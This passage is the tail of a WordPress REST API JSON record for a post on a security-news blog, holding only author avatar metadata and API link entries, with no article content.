Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/53369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=53369"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/53369\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/53370"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=53369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=53369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=53369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}